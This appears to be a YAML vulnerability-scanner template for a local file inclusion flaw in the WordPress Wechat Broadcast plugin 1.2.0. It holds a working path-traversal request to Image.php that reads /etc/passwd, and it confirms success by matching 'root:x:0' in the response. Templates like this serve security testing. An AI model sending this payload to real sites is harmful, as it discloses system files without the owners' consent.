product: WordPress
vName: WordPress Plugin Wechat Broadcast - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: ''
version: '1.2.0'
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/45438
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
    verify:
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and
